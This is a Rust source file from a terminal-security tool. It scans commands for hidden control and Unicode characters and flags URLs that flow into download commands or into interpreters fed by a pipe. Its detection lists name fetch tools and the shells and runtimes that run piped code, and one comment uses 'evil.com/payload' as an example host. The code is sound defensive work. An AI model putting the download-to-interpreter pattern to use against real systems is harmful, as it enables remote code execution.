Skip to main content

tirith_core/
extract.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
/// Context for Tier 1 scanning.
///
/// Selects which generated pattern set applies and whether the fast-exit
/// short-circuit is allowed (see [`tier1_scan`]).
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
    /// Exec-time: command about to be executed (check subcommand).
    Exec,
    /// Paste-time: content being pasted (paste subcommand).
    Paste,
    /// File scan: content read from a file (scan subcommand).
    /// Skips tier-1 fast-exit, runs byte scan + configfile rules only.
    FileScan,
}
18
// Include generated Tier 1 patterns from build.rs declarative pattern table.
// `OUT_DIR` is populated at build time; see build.rs for the pattern table.
#[allow(dead_code)] // not every generated item is referenced by this module
mod tier1_generated {
    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
24
/// Expose the build-time extractor IDs for test-time cross-referencing.
///
/// The slice is generated by build.rs alongside the Tier 1 patterns.
pub fn extractor_ids() -> &'static [&'static str] {
    tier1_generated::EXTRACTOR_IDS
}
29
/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
/// Compiled lazily on first use; a compile failure here is a build-table bug.
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});
34
/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
/// Compiled lazily on first use; a compile failure here is a build-table bug.
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});
39
/// Standard URL extraction regex for Tier 3.
///
/// First alternative: scheme-prefixed URLs (http/https/ftp/ssh/git).
/// Second alternative: scp-style `user@host:path` remote specs.
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
    )
    .expect("url regex must compile")
});
47
/// Result of the paste-time byte scan (see [`scan_bytes`]): one flag per
/// threat class plus per-offset findings.
pub struct ByteScanResult {
    /// ESC-introduced sequences (CSI/OSC/APC/DCS) or a trailing lone ESC.
    pub has_ansi_escapes: bool,
    /// Raw control bytes (< 0x20 excluding \n/\t/ESC, attack-style \r, or DEL).
    pub has_control_chars: bool,
    /// Bidirectional text controls (marks, embeddings/overrides, isolates).
    pub has_bidi_controls: bool,
    /// Zero-width characters (ZWSP, ZWNJ, ZWJ, BOM, CGJ, soft hyphen, word joiner).
    pub has_zero_width: bool,
    /// Input is not valid UTF-8.
    pub has_invalid_utf8: bool,
    /// Unicode Tag characters U+E0000–U+E007F (hidden ASCII encoding).
    pub has_unicode_tags: bool,
    /// Variation selectors U+FE00–U+FE0F and U+E0100–U+E01EF.
    pub has_variation_selectors: bool,
    /// Invisible math operators U+2061–U+2064.
    pub has_invisible_math_operators: bool,
    /// Hair Space, Thin Space, Narrow No-Break Space.
    pub has_invisible_whitespace: bool,
    /// Per-offset findings backing the flags above.
    pub details: Vec<ByteFinding>,
}
61
/// A single suspicious byte or character located by [`scan_bytes`].
pub struct ByteFinding {
    /// Byte offset into the scanned input.
    pub offset: usize,
    /// The byte at `offset` (lead byte for multi-byte characters).
    pub byte: u8,
    /// Full Unicode codepoint for multi-byte characters (None for single-byte findings).
    pub codepoint: Option<u32>,
    /// Human-readable description of the finding.
    pub description: String,
}
69
/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
///
/// `Exec` and `Paste` use the generated pattern sets (paste adds paste-only
/// patterns on top of the exec ones); `FileScan` never fast-exits.
pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
    match context {
        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
        // FileScan always proceeds to tier-3 (no fast-exit)
        ScanContext::FileScan => true,
    }
}
79
80/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
81pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
82    let mut result = ByteScanResult {
83        has_ansi_escapes: false,
84        has_control_chars: false,
85        has_bidi_controls: false,
86        has_zero_width: false,
87        has_invalid_utf8: false,
88        has_unicode_tags: false,
89        has_variation_selectors: false,
90        has_invisible_math_operators: false,
91        has_invisible_whitespace: false,
92        details: Vec::new(),
93    };
94
95    // Check for invalid UTF-8
96    if std::str::from_utf8(input).is_err() {
97        result.has_invalid_utf8 = true;
98    }
99
100    let len = input.len();
101    let mut i = 0;
102    while i < len {
103        let b = input[i];
104
105        // Escape sequences: CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP)
106        if b == 0x1b {
107            if i + 1 < len {
108                let next = input[i + 1];
109                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
110                    result.has_ansi_escapes = true;
111                    result.details.push(ByteFinding {
112                        offset: i,
113                        byte: b,
114                        codepoint: None,
115                        description: match next {
116                            b'[' => "CSI escape sequence",
117                            b']' => "OSC escape sequence",
118                            b'_' => "APC escape sequence",
119                            b'P' => "DCS escape sequence",
120                            _ => "escape sequence",
121                        }
122                        .to_string(),
123                    });
124                    i += 2;
125                    continue;
126                }
127            } else {
128                // Trailing lone ESC
129                result.has_ansi_escapes = true;
130                result.details.push(ByteFinding {
131                    offset: i,
132                    byte: b,
133                    codepoint: None,
134                    description: "trailing escape byte".to_string(),
135                });
136            }
137        }
138
139        // Control characters (< 0x20, excluding common whitespace and ESC)
140        // For \r: only flag when followed by non-\n (display-overwriting attack).
141        // Trailing \r and \r\n (Windows line endings) are benign clipboard artifacts.
142        if b == b'\r' {
143            let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
144            if is_attack_cr {
145                result.has_control_chars = true;
146                result.details.push(ByteFinding {
147                    offset: i,
148                    byte: b,
149                    codepoint: None,
150                    description: format!("control character 0x{b:02x}"),
151                });
152            }
153        } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
154            result.has_control_chars = true;
155            result.details.push(ByteFinding {
156                offset: i,
157                byte: b,
158                codepoint: None,
159                description: format!("control character 0x{b:02x}"),
160            });
161        }
162
163        // DEL character
164        if b == 0x7F {
165            result.has_control_chars = true;
166            result.details.push(ByteFinding {
167                offset: i,
168                byte: b,
169                codepoint: None,
170                description: "control character 0x7f (DEL)".to_string(),
171            });
172        }
173
174        // Check for UTF-8 multi-byte sequences that are bidi or zero-width
175        if b >= 0xc0 {
176            // Try to decode UTF-8 character
177            let remaining = &input[i..];
178            if let Some(ch) = std::str::from_utf8(remaining)
179                .ok()
180                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
181                .and_then(|s| s.chars().next())
182            {
183                // Bidi controls
184                if is_bidi_control(ch) {
185                    result.has_bidi_controls = true;
186                    result.details.push(ByteFinding {
187                        offset: i,
188                        byte: b,
189                        codepoint: Some(ch as u32),
190                        description: format!("bidi control U+{:04X}", ch as u32),
191                    });
192                }
193                // Zero-width characters (ZWSP, ZWNJ, ZWJ, BOM, CGJ, Soft Hyphen, Word Joiner)
194                // BOM (U+FEFF) at offset 0 is a file-encoding artifact, not an attack
195                if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
196                    result.has_zero_width = true;
197                    result.details.push(ByteFinding {
198                        offset: i,
199                        byte: b,
200                        codepoint: Some(ch as u32),
201                        description: format!("zero-width character U+{:04X}", ch as u32),
202                    });
203                }
204                // Unicode Tags (hidden ASCII encoding) U+E0000–U+E007F
205                if is_unicode_tag(ch) {
206                    result.has_unicode_tags = true;
207                    result.details.push(ByteFinding {
208                        offset: i,
209                        byte: b,
210                        codepoint: Some(ch as u32),
211                        description: format!("unicode tag U+{:04X}", ch as u32),
212                    });
213                }
214                // Variation selectors: U+FE00–U+FE0F and U+E0100–U+E01EF
215                if is_variation_selector(ch) {
216                    result.has_variation_selectors = true;
217                    result.details.push(ByteFinding {
218                        offset: i,
219                        byte: b,
220                        codepoint: Some(ch as u32),
221                        description: format!("variation selector U+{:04X}", ch as u32),
222                    });
223                }
224                // Invisible math operators U+2061–U+2064
225                if is_invisible_math_operator(ch) {
226                    result.has_invisible_math_operators = true;
227                    result.details.push(ByteFinding {
228                        offset: i,
229                        byte: b,
230                        codepoint: Some(ch as u32),
231                        description: format!("invisible math operator U+{:04X}", ch as u32),
232                    });
233                }
234                // Invisible whitespace: Hair Space, Thin Space, Narrow No-Break Space
235                if is_invisible_whitespace(ch) {
236                    result.has_invisible_whitespace = true;
237                    result.details.push(ByteFinding {
238                        offset: i,
239                        byte: b,
240                        codepoint: Some(ch as u32),
241                        description: format!("invisible whitespace U+{:04X}", ch as u32),
242                    });
243                }
244                i += ch.len_utf8();
245                continue;
246            }
247        }
248
249        i += 1;
250    }
251
252    result
253}
254
/// Check if a character is a bidi control.
///
/// Covers the marks (LRM/RLM), the embeddings/overrides (LRE, RLE, PDF,
/// LRO, RLO), and the isolates (LRI, RLI, FSI, PDI).
fn is_bidi_control(ch: char) -> bool {
    matches!(
        ch as u32,
        0x200E          // LRM
        | 0x200F        // RLM
        | 0x202A..=0x202E // LRE, RLE, PDF, LRO, RLO
        | 0x2066..=0x2069 // LRI, RLI, FSI, PDI
    )
}
272
/// Check if a character is zero-width.
///
/// The set is ZWSP, ZWNJ, ZWJ, BOM/ZWNBSP, Combining Grapheme Joiner,
/// Soft Hyphen, and Word Joiner.
fn is_zero_width(ch: char) -> bool {
    const ZERO_WIDTH: [char; 7] = [
        '\u{200B}', // ZWSP
        '\u{200C}', // ZWNJ
        '\u{200D}', // ZWJ
        '\u{FEFF}', // BOM / ZWNBSP
        '\u{034F}', // Combining Grapheme Joiner
        '\u{00AD}', // Soft Hyphen
        '\u{2060}', // Word Joiner
    ];
    ZERO_WIDTH.contains(&ch)
}
286
/// Check if a character is a Unicode Tag (hidden ASCII encoding),
/// i.e. in the U+E0000–U+E007F block.
fn is_unicode_tag(ch: char) -> bool {
    matches!(ch, '\u{E0000}'..='\u{E007F}')
}
291
/// Check if a character is a variation selector:
/// VS1–VS16 (U+FE00–U+FE0F) or the supplementary VS17–VS256
/// (U+E0100–U+E01EF).
fn is_variation_selector(ch: char) -> bool {
    matches!(ch, '\u{FE00}'..='\u{FE0F}' | '\u{E0100}'..='\u{E01EF}')
}
299
/// Check if a character is an invisible math operator:
/// Function Application, Invisible Times, Invisible Separator, or
/// Invisible Plus (U+2061–U+2064).
fn is_invisible_math_operator(ch: char) -> bool {
    matches!(ch, '\u{2061}'..='\u{2064}')
}
305
/// Check if a character is an easily-missed whitespace variant:
/// Hair Space, Thin Space, or Narrow No-Break Space.
fn is_invisible_whitespace(ch: char) -> bool {
    const THIN_SPACES: [char; 3] = [
        '\u{200A}', // Hair Space
        '\u{2009}', // Thin Space
        '\u{202F}', // Narrow No-Break Space
    ];
    THIN_SPACES.contains(&ch)
}
315
/// Tier 3: Extract URL-like patterns from a command string.
/// Uses shell-aware tokenization, then extracts URLs from each segment.
///
/// Each result is tagged with the index of the segment it came from and
/// whether that segment is a "sink" context (see [`is_sink_context`]).
pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
    let segments = tokenize::tokenize(input, shell);
    let mut results = Vec::new();

    for (seg_idx, segment) in segments.iter().enumerate() {
        let sink_context = is_sink_context(segment, &segments);
        let resolved = resolve_segment_command(segment);

        // Extract standard URLs from command + args plus leading env-assignment values.
        // Keep the raw-text expansion targeted so output/auth false-positive suppression
        // still applies to the command/arg path.
        let mut url_sources: Vec<&str> = Vec::new();
        if let Some(ref cmd) = segment.command {
            url_sources.push(cmd.as_str());
        }
        for arg in &segment.args {
            url_sources.push(arg.as_str());
        }
        // Proxy variables (NO_PROXY / *_PROXY) legitimately hold URLs; skip them.
        for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
            if ignores_env_assignment_url(&name) {
                continue;
            }
            let clean = strip_quotes(&value);
            if !clean.is_empty() {
                push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
            }
        }
        for source in &url_sources {
            push_urls_from_source(source, seg_idx, sink_context, &mut results);
        }

        // Check for schemeless URLs in sink contexts
        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
        let is_docker_cmd = resolved
            .as_ref()
            .is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
        if sink_context && !is_docker_cmd {
            if let Some(cmd) = resolved.as_ref() {
                for (arg_idx, arg) in cmd.args.iter().enumerate() {
                    // Skip args that are output-file flag values
                    if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
                        continue;
                    }
                    let clean = strip_quotes(arg);
                    // scp/rsync `user@host` destinations are not schemeless URLs.
                    if is_remote_copy_target(&cmd.name, &clean) {
                        continue;
                    }
                    // Only flag if the arg was NOT already captured by URL_REGEX.
                    if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
                        results.push(ExtractedUrl {
                            raw: clean.clone(),
                            parsed: UrlLike::SchemelessHostPath {
                                host: extract_host_from_schemeless(&clean),
                                path: extract_path_from_schemeless(&clean),
                            },
                            segment_index: seg_idx,
                            in_sink_context: true,
                        });
                    }
                }
            }
        }

        // Check for Docker refs in docker commands
        if let Some(cmd) = resolved.as_ref() {
            if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
                if let Some(docker_subcmd) = cmd.args.first() {
                    let subcmd_lower = docker_subcmd.to_lowercase();
                    if subcmd_lower == "build" {
                        // For build, only -t/--tag values are image refs
                        let mut i = 1;
                        while i < cmd.args.len() {
                            let arg = strip_quotes(&cmd.args[i]);
                            // Separate form: -t NAME / --tag NAME
                            if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
                                let tag_val = strip_quotes(&cmd.args[i + 1]);
                                if !tag_val.is_empty() {
                                    let docker_url = parse::parse_docker_ref(&tag_val);
                                    results.push(ExtractedUrl {
                                        raw: tag_val,
                                        parsed: docker_url,
                                        segment_index: seg_idx,
                                        in_sink_context: true,
                                    });
                                }
                                i += 2;
                            } else if arg.starts_with("-t") && arg.len() > 2 {
                                // Inline form: -tNAME
                                let tag_val = strip_quotes(&arg[2..]);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else if let Some(val) = arg.strip_prefix("--tag=") {
                                // Equals form: --tag=NAME
                                let tag_val = strip_quotes(val);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else {
                                i += 1;
                            }
                        }
                    } else if subcmd_lower == "image" {
                        // docker image pull/push/inspect — actual subcmd is args[1]
                        if let Some(image_subcmd) = cmd.args.get(1) {
                            let image_subcmd_lower = image_subcmd.to_lowercase();
                            if matches!(
                                image_subcmd_lower.as_str(),
                                "pull" | "push" | "inspect" | "rm" | "tag"
                            ) {
                                extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
                            }
                        }
                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
                        // First non-flag arg is image, then stop
                        extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
                    }
                }
            }
        }
    }

    results
}
448
/// An extracted URL with context.
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
    /// The matched text, quotes stripped where applicable.
    pub raw: String,
    /// Structured interpretation of `raw` (see `parse::UrlLike`).
    pub parsed: UrlLike,
    /// Index of the shell segment the URL was found in.
    pub segment_index: usize,
    /// True when the segment executes/downloads its input.
    pub in_sink_context: bool,
}
457
/// Common value-taking flags across docker subcommands.
/// These consume the NEXT argument as their value, so that argument must
/// never be treated as the image reference.
const DOCKER_VALUE_FLAGS: &[&str] = &[
    "--platform",
    "--format",
    "--filter",
    "-f",
    "--label",
    "-l",
    "--name",
    "--hostname",
    "--user",
    "-u",
    "--workdir",
    "-w",
    "--network",
    "--net",
    "--env",
    "-e",
    "--env-file",
    "--publish",
    "-p",
    "--expose",
    "--volume",
    "-v",
    "--mount",
    "--add-host",
    "--device",
    "--entrypoint",
    "--log-driver",
    "--log-opt",
    "--restart",
    "--runtime",
    "--cpus",
    "--cpu-shares",
    "--cpu-quota",
    "--memory",
    "--memory-reservation",
    "--memory-swap",
    "--shm-size",
    "--ulimit",
    "--security-opt",
    "--sysctl",
    "--tmpfs",
    "--gpus",
    "--ipc",
    "--pid",
    "--userns",
    "--cgroupns",
];
507
/// Short flags that may embed their value inline (e.g., -p8080:80), so the
/// whole token is a flag+value pair and the next argument is NOT a value.
const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
510
511/// Extract the first non-flag argument as a Docker image reference.
512fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
513    let mut skip_next = false;
514    let mut end_of_options = false;
515    for arg in args {
516        if skip_next {
517            skip_next = false;
518            continue;
519        }
520        let clean = strip_quotes(arg);
521        if clean == "--" {
522            end_of_options = true;
523            continue;
524        }
525        if !end_of_options && clean.starts_with("--") && clean.contains('=') {
526            continue; // --flag=value, skip
527        }
528        if !end_of_options && clean.starts_with('-') {
529            if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
530                skip_next = true;
531            }
532            if DOCKER_VALUE_PREFIXES
533                .iter()
534                .any(|p| clean.starts_with(p) && clean.len() > p.len())
535            {
536                continue;
537            }
538            continue;
539        }
540        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
541            let docker_url = parse::parse_docker_ref(&clean);
542            results.push(ExtractedUrl {
543                raw: clean,
544                parsed: docker_url,
545                segment_index: seg_idx,
546                in_sink_context: true,
547            });
548        }
549        break; // Only first non-flag arg is the image
550    }
551}
552
/// A command after unwrapping wrapper commands (`env`, `command`, `time`,
/// `tirith run`): the effective command name plus its remaining args.
#[derive(Debug, Clone)]
struct ResolvedCommand<'a> {
    // Lowercased basename of the command (see `command_base_name`).
    name: String,
    // Arguments following the resolved command, borrowed from the segment.
    args: &'a [String],
}
558
559fn push_urls_from_source(
560    source: &str,
561    segment_index: usize,
562    in_sink_context: bool,
563    results: &mut Vec<ExtractedUrl>,
564) {
565    for mat in URL_REGEX.find_iter(source) {
566        let raw = mat.as_str().to_string();
567        let url = parse::parse_url(&raw);
568        results.push(ExtractedUrl {
569            raw,
570            parsed: url,
571            segment_index,
572            in_sink_context,
573        });
574    }
575}
576
/// Env-assignment names whose values legitimately contain URLs (proxy
/// settings) and should be skipped during URL extraction.
/// Matches any `*_PROXY` variable, case-insensitively.
fn ignores_env_assignment_url(name: &str) -> bool {
    // "NO_PROXY" itself ends with "_PROXY", so the suffix check alone covers
    // both the explicit NO_PROXY case and HTTP_PROXY / HTTPS_PROXY / etc.
    name.to_ascii_uppercase().ends_with("_PROXY")
}
581
/// Whether an `env` long flag takes a value argument.
/// Any `=value` suffix is stripped before comparing the flag name.
fn env_long_flag_takes_value(flag: &str) -> bool {
    let name = match flag.split_once('=') {
        Some((head, _)) => head,
        None => flag,
    };
    matches!(name, "--unset" | "--chdir" | "--split-string")
}
586
587fn command_base_name(raw: &str) -> String {
588    let clean = strip_quotes(raw);
589    clean
590        .rsplit(['/', '\\'])
591        .next()
592        .unwrap_or(clean.as_str())
593        .to_lowercase()
594}
595
/// Resolve a tokenized segment's effective command, unwrapping wrappers.
/// Returns `None` when the segment has no command.
fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
    let command = segment.command.as_ref()?;
    resolve_named_command(command, &segment.args)
}
600
/// Map a command token to its effective command, recursively unwrapping the
/// known wrappers (`env`, `command`, `time`, `tirith`).
fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
    let name = command_base_name(command);
    match name.as_str() {
        "env" => resolve_env_command(args),
        "command" => resolve_command_wrapper(args),
        "time" => resolve_time_wrapper(args),
        "tirith" => resolve_tirith_command(args),
        _ => Some(ResolvedCommand { name, args }),
    }
}
611
/// Resolve `env [NAME=VAL…] [flags…] CMD ARGS…` to the wrapped command.
///
/// First loop: skip assignments and flags (consuming a following value for
/// -u/-C/-S and value-taking long flags) until `--` or the command name.
/// Second loop runs after `--` (or is a no-op if the first loop consumed
/// everything): only assignments may still precede the command there.
fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
    let mut i = 0;
    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if clean == "--" {
            i += 1;
            break;
        }
        if tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        if clean.starts_with('-') {
            if clean.starts_with("--") {
                // Long flag: consume a separate value unless given as --flag=value.
                if env_long_flag_takes_value(&clean) && !clean.contains('=') {
                    i += 2;
                } else {
                    i += 1;
                }
                continue;
            }
            // Short flags that take a separate value argument.
            if clean == "-u" || clean == "-C" || clean == "-S" {
                i += 2;
                continue;
            }
            i += 1;
            continue;
        }
        return resolve_named_command(&clean, &args[i + 1..]);
    }

    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        return resolve_named_command(&clean, &args[i + 1..]);
    }

    None
}
654
655fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
656    let mut i = 0;
657    while i < args.len() {
658        let clean = strip_quotes(&args[i]);
659        if clean == "--" {
660            i += 1;
661            break;
662        }
663        if clean.starts_with('-') {
664            i += 1;
665            continue;
666        }
667        break;
668    }
669    args.get(i)
670        .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
671}
672
673fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
674    let mut i = 0;
675    while i < args.len() {
676        let clean = strip_quotes(&args[i]);
677        if clean == "--" {
678            i += 1;
679            break;
680        }
681        if clean.starts_with('-') {
682            if clean == "-f" || clean == "--format" || clean == "-o" || clean == "--output" {
683                i += 2;
684            } else {
685                i += 1;
686            }
687            continue;
688        }
689        break;
690    }
691    args.get(i)
692        .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
693}
694
695fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
696    let subcommand = args.first().map(|arg| command_base_name(arg))?;
697    match subcommand.as_str() {
698        "run" => Some(ResolvedCommand {
699            name: "tirith-run".to_string(),
700            args: &args[1..],
701        }),
702        _ => Some(ResolvedCommand {
703            name: "tirith".to_string(),
704            args,
705        }),
706    }
707}
708
/// Check if a segment is in a "sink" context (executing/downloading).
///
/// True when the resolved command is a known download/source command
/// (with git restricted to its downloading subcommands), or when the
/// segment receives piped input and is a known interpreter.
fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
    if let Some(cmd) = resolve_segment_command(segment) {
        let cmd_lower = cmd.name;
        // git is only a sink for download subcommands (clone, fetch, pull, etc.)
        if cmd_lower == "git" {
            return is_git_sink(cmd.args);
        }
        if is_source_command(&cmd_lower) {
            return true;
        }
    }

    // Check if this segment pipes into a sink
    if let Some(sep) = &segment.preceding_separator {
        if sep == "|" || sep == "|&" {
            // This segment receives piped input — check if it's an interpreter
            if let Some(cmd) = resolve_segment_command(segment) {
                if is_interpreter(&cmd.name) {
                    return true;
                }
            }
        }
    }

    false
}
736
/// Commands that fetch or execute remote content (download sinks).
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        // HTTP clients
        "curl", "wget", "http", "https", "xh", "fetch",
        // Remote copy
        "scp", "rsync",
        // Container engines
        "docker", "podman", "nerdctl",
        // Package managers / toolchains
        "pip", "pip3", "npm", "npx", "yarn", "pnpm", "go", "cargo",
        // PowerShell fetchers
        "iwr", "irm", "invoke-webrequest", "invoke-restmethod",
        // Our own runner
        "tirith-run",
    ];
    SOURCE_COMMANDS.contains(&cmd)
}
766
/// For scp/rsync only: true when `arg` looks like a bare `user@host`
/// destination (no path or port component), which should not be treated
/// as a schemeless URL.
fn is_remote_copy_target(cmd: &str, arg: &str) -> bool {
    if cmd != "scp" && cmd != "rsync" {
        return false;
    }
    match arg.split_once('@') {
        Some((user_part, host_part)) => {
            !user_part.contains(':') && !host_part.contains('/') && !host_part.contains(':')
        }
        None => false,
    }
}
780
781/// Check if a git command is in a sink context (only subcommands that download).
782/// `git add`, `git commit`, `git status`, etc. are NOT sinks.
783fn is_git_sink(args: &[String]) -> bool {
784    if args.is_empty() {
785        return false;
786    }
787    // First non-flag arg is the subcommand
788    for arg in args {
789        let clean = strip_quotes(arg);
790        if clean.starts_with('-') {
791            continue;
792        }
793        return matches!(
794            clean.as_str(),
795            "clone" | "fetch" | "pull" | "submodule" | "remote"
796        );
797    }
798    false
799}
800
/// Commands that execute whatever is piped into them.
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh", "bash", "zsh", "dash", "ksh", // shells
        "python", "python3", "node", "perl", "ruby", "php", // language runtimes
        "iex", "invoke-expression", // PowerShell eval
    ];
    INTERPRETERS.contains(&cmd)
}
818
/// Check if an arg at the given index is the value of an output-file or credential flag
/// for the given command. Returns true if this arg should be skipped during schemeless
/// URL detection (output filenames and auth credentials can look like domains).
fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
    // Normalize: lowercase and strip any leading path (e.g. /usr/bin/curl).
    let cmd_lower = cmd.to_lowercase();
    let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);

    match cmd_base {
        "curl" => {
            // Value of a separate output/credential flag in the previous arg.
            if arg_index > 0 {
                let prev = strip_quotes(&args[arg_index - 1]);
                if prev == "-o"
                    || prev == "--output"
                    || prev == "-u"
                    || prev == "--user"
                    || prev == "-U"
                    || prev == "--proxy-user"
                {
                    return true;
                }
            }
            let current = strip_quotes(&args[arg_index]);
            // Inline short form: -oFILE (but not long flags like --output).
            if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
                return true;
            }
            // --flag=value forms.
            if current.starts_with("--output=")
                || current.starts_with("--user=")
                || current.starts_with("--proxy-user=")
            {
                return true;
            }
            false
        }
        "wget" => {
            // Value of a separate output/credential flag in the previous arg.
            if arg_index > 0 {
                let prev = strip_quotes(&args[arg_index - 1]);
                if prev == "-O"
                    || prev == "--output-document"
                    || prev == "--user"
                    || prev == "--password"
                    || prev == "--http-user"
                    || prev == "--http-password"
                    || prev == "--ftp-user"
                    || prev == "--ftp-password"
                    || prev == "--proxy-user"
                    || prev == "--proxy-password"
                {
                    return true;
                }
            }
            let current = strip_quotes(&args[arg_index]);
            // Inline short form: -OFILE (but not long flags).
            if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
                return true;
            }
            // --flag=value forms.
            if current.starts_with("--output-document=")
                || current.starts_with("--user=")
                || current.starts_with("--password=")
                || current.starts_with("--http-user=")
                || current.starts_with("--http-password=")
                || current.starts_with("--ftp-user=")
                || current.starts_with("--ftp-password=")
                || current.starts_with("--proxy-user=")
                || current.starts_with("--proxy-password=")
            {
                return true;
            }
            false
        }
        "http" | "https" | "xh" => {
            // httpie/xh: only the auth flag takes a credential value.
            if arg_index > 0 {
                let prev = strip_quotes(&args[arg_index - 1]);
                if prev == "-a" || prev == "--auth" {
                    return true;
                }
            }
            let current = strip_quotes(&args[arg_index]);
            if current.starts_with("--auth=") {
                return true;
            }
            false
        }
        _ => false,
    }
}
903
/// Trims surrounding whitespace, then removes one matching pair of
/// surrounding quotes (double or single) if present.
///
/// A lone quote character or mismatched quotes are returned unchanged
/// (after trimming).
fn strip_quotes(s: &str) -> String {
    let trimmed = s.trim();
    for quote in ['"', '\''] {
        // strip_suffix on the remainder guarantees the string had BOTH a
        // leading and a trailing quote (so a lone `"` stays untouched).
        if let Some(inner) = trimmed
            .strip_prefix(quote)
            .and_then(|rest| rest.strip_suffix(quote))
        {
            return inner.to_string();
        }
    }
    trimmed.to_string()
}
914
/// Heuristic: does `s` look like a schemeless host (optionally with a path),
/// e.g. `evil.com/payload`, as opposed to a filename like `lenna.png`?
fn looks_like_schemeless_host(s: &str) -> bool {
    // Flags, dot-less tokens, and dotfiles/hidden files (.gitignore,
    // .env.example) are never hosts.
    if s.starts_with('-') || s.starts_with('.') || !s.contains('.') {
        return false;
    }
    // Split into the host candidate (before the first '/') and the remainder.
    let (host_part, path) = match s.split_once('/') {
        Some((head, tail)) => (head, Some(tail)),
        None => (s, None),
    };
    if !host_part.contains('.') || host_part.contains(' ') {
        return false;
    }
    // A path is "meaningful" only when something non-trivial follows the
    // first slash; a bare trailing slash (file.sh/) or a double slash still
    // reads as a filename, not a domain.
    let has_meaningful_path = path.is_some_and(|rest| !rest.is_empty() && rest != "/");
    if !has_meaningful_path {
        // Without a path, a host ending in a common file extension is treated
        // as a filename — even where the extension overlaps a real TLD
        // (.zip, .sh). With a path (evil.zip/payload) the host wins.
        const FILE_EXTS: &[&str] = &[
            ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h",
            ".txt", ".md", ".json", ".yaml", ".yml", ".xml", ".html", ".css",
            ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip", ".gz", ".bz2",
            ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so",
            ".log", ".conf", ".cfg", ".ini", ".toml",
            ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".ico", ".tiff", ".tif",
            ".pdf", ".csv",
            ".mp3", ".mp4", ".wav", ".avi", ".mkv", ".flac", ".ogg", ".webm",
            ".ttf", ".otf", ".woff", ".woff2",
